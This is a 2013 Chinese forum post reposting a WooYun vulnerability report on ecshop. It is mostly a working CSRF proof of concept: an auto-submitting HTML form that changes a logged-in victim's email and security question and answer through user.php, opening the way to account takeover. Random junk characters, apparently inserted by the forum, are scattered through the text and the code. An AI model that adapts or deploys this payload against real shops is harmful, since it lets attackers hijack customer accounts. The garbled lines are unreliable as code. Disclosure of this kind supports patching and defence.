找回密码
 立即注册
查看: 2928|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:- X7 [9 |  k2 [4 [7 z
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现: `; s7 x& q3 R

4 G7 Y3 s5 A+ y  ADemo For:http://www.wooyun.org/bug.php?action=view&id=3953 k3 s$ w6 R) H( K

7 I! R4 w9 L6 M详细说明:, a9 v: V- C* {2 B) a$ E
利用csrf和xss可以突破官方所说的“障碍”8 y( a* Y2 A1 `) R) Z. u4 A  f
xss版本已经有人说明: x6 N# R$ W9 ]) z
这里给出csrf版本2 J/ l1 `( r' y. g2 B* d

# N4 D; z( [, [漏洞证明:4 i: N& A. N  C8 x7 G
<html>
& V- a% o$ w& ]8 }9 Y<body>+ D9 \6 x* L. d: a& x6 O: g7 ?
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
: g  b' U7 a& A, A) n: }<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">2 N! x/ v! o( ]
<INPUT TYPE="text" NAME="act" value="act_edit_profile">$ G( F* F( O0 n2 S4 f3 \( e" J! E. C
<INPUT TYPE="text" NAME="sel_question" value="ecshop">* C3 e7 N# ^6 v
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">3 ?( W+ f; G" z+ `0 D: Z
</body>0 F  r) y; L, |& J$ M- Y/ }  e
<script>% u2 Q: B- Z) H" K  |
document.forms[0].submit();& }* s% v8 k( G' L3 M5 `; d' D
</script>
+ W* ]" \" v( _/ d' |</html>, z% W# ?0 y6 V/ u3 U4 X
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
  R1 P' |8 t' M2 s
" A  d9 e0 P5 A* d; Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表